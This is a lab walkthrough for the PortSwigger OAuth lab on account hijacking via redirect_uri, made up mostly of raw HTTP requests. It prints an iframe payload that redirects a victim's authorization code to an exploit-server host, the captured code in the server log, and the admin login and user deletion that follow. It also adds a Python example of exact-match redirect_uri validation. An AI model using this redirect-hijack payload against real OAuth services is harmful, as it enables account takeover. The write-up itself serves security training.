
PortSwigger: OAuth account hijacking via redirect_uri

OAuth account hijacking via redirect_uri

Solution

Finding: the authorization request that carries redirect_uri

GET /auth?client_id=xkbj7l2suffcqfqag06c0&redirect_uri=https://0aa0005303441e9081eed90a00e7004d.web-security-academy.net/oauth-callback&response_type=code&scope=openid%20profile%20email HTTP/2
Host: oauth-0a19003e03821eda8144d73002d100dd.oauth-server.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Priority: u=0, i
Te: trailers
Connection: keep-alive
---
GET /interaction/cO63zenFp3eEfMxIiRAQP HTTP/2
Host: oauth-0a19003e03821eda8144d73002d100dd.oauth-server.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Priority: u=0, i
Te: trailers
Referer: https://oauth-0a19003e03821eda8144d73002d100dd.oauth-server.net/auth?client_id=xkbj7l2suffcqfqag06c0&redirect_uri=https://0aa0005303441e9081eed90a00e7004d.web-security-academy.net/oauth-callback&response_type=code&scope=openid%20profile%20email

Create exploit

Edit redirect_uri so it points at the exploit server (the authorization server does not check it against the client's registered callback):
redirect_uri=https://exploit-0ac7002d03cd1ed68161d8f5015d00e9.exploit-server.net
---
<iframe src="https://oauth-0a19003e03821eda8144d73002d100dd.oauth-server.net/auth?client_id=xkbj7l2suffcqfqag06c0&redirect_uri=https://exploit-0ac7002d03cd1ed68161d8f5015d00e9.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>
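The step above works because the authorization server hands the code to whatever redirect_uri the browser supplied. The following is an added example, not PortSwigger's lab code, showing what the /auth endpoint should have done: compare redirect_uri against the client's registered URIs with an exact string match (RFC 6749 section 3.1.2.2 and the OAuth 2.0 Security BCP) before issuing a code. The client_id and URIs are the ones from the requests on this page; the client registry, the request lines and the function names are constructed for the example.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed client registry: a stand-in for what the authorization server
# would hold for the lab's client. The URI is the legitimate callback seen above.
REGISTERED_CLIENTS = {
    "xkbj7l2suffcqfqag06c0": {
        "https://0aa0005303441e9081eed90a00e7004d.web-security-academy.net/oauth-callback",
    },
}


class RedirectUriError(ValueError):
    """Raised when redirect_uri cannot be matched to the client's registration."""


def parse_auth_request(request_line):
    """Extract query parameters from a request line such as 'GET /auth?... HTTP/2'."""
    method, target, _version = request_line.split(" ", 2)
    if method != "GET":
        raise ValueError("authorization endpoint expects GET")
    query = urlsplit(target).query
    # keep_blank_values so an empty redirect_uri is seen rather than silently dropped
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def vulnerable_resolve_redirect(params):
    """What the lab server effectively does: trust redirect_uri as supplied by the browser."""
    return params["redirect_uri"]


def hardened_resolve_redirect(params):
    """Exact-match redirect_uri against the client's registered set before issuing a code."""
    client_id = params.get("client_id", "")
    redirect_uri = params.get("redirect_uri")
    registered = REGISTERED_CLIENTS.get(client_id)
    if registered is None:
        raise RedirectUriError("unknown client_id")
    if redirect_uri is None:
        # Omitting the parameter is only acceptable when exactly one URI is registered.
        if len(registered) != 1:
            raise RedirectUriError("redirect_uri required")
        return next(iter(registered))
    # Plain string comparison: no prefix, host-only or pattern matching, so a
    # different host, scheme, path or an appended query cannot slip through.
    if redirect_uri not in registered:
        raise RedirectUriError("redirect_uri not registered for client")
    return redirect_uri


def classify(request_line):
    """'allowed' or 'rejected' under the hardened handler; the same test works as a
    detection rule over authorization-server access logs."""
    try:
        hardened_resolve_redirect(parse_auth_request(request_line))
        return "allowed"
    except RedirectUriError:
        return "rejected"


# Constructed request lines: the legitimate one and the one the iframe above sends.
LEGIT_REQUEST = (
    "GET /auth?client_id=xkbj7l2suffcqfqag06c0"
    "&redirect_uri=https://0aa0005303441e9081eed90a00e7004d.web-security-academy.net/oauth-callback"
    "&response_type=code&scope=openid%20profile%20email HTTP/2"
)
TAMPERED_REQUEST = (
    "GET /auth?client_id=xkbj7l2suffcqfqag06c0"
    "&redirect_uri=https://exploit-0ac7002d03cd1ed68161d8f5015d00e9.exploit-server.net"
    "&response_type=code&scope=openid%20profile%20email HTTP/2"
)

if __name__ == "__main__":
    for line in (LEGIT_REQUEST, TAMPERED_REQUEST):
        params = parse_auth_request(line)
        print("vulnerable server would redirect to:", vulnerable_resolve_redirect(params))
        print("hardened server:", classify(line))
```

The hardened handler refuses the request before any code exists, so the browser is never sent to the attacker-controlled host. Exact matching is the important design choice: prefix or host-level comparisons are what make the more advanced variants of this lab exploitable.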

Read logs

Find the new authorization code issued for the admin user in the exploit server log
https://exploit-0ac7002d03cd1ed68161d8f5015d00e9.exploit-server.net/log
---
...
10.0.3.30       2026-01-08 09:22:49 +0000 "GET /?code=5o5ZSN176O0QPSqZAXi-Etnfrc4t7uZ352FaP9VO9ih HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
...

Login as admin user

OAuth code: 5o5ZSN176O0QPSqZAXi-Etnfrc4t7uZ352FaP9VO9ih
https://0aa0005303441e9081eed90a00e7004d.web-security-academy.net/oauth-callback?code=5o5ZSN176O0QPSqZAXi-Etnfrc4t7uZ352FaP9VO9ih
---
GET /oauth-callback?code=5o5ZSN176O0QPSqZAXi-Etnfrc4t7uZ352FaP9VO9ih HTTP/2
Host: 0aa0005303441e9081eed90a00e7004d.web-security-academy.net
Cookie: session=V9m3j4dovyUTOLDimGhnRXFniMrqcjhd
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Delete user: carlos (admin panel)

GET /admin/delete?username=carlos HTTP/2
Host: 0aa0005303441e9081eed90a00e7004d.web-security-academy.net
Cookie: session=AXy0afqbUG3EvnK6rTLR9iIG8FBktyQB
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0aa0005303441e9081eed90a00e7004d.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Solved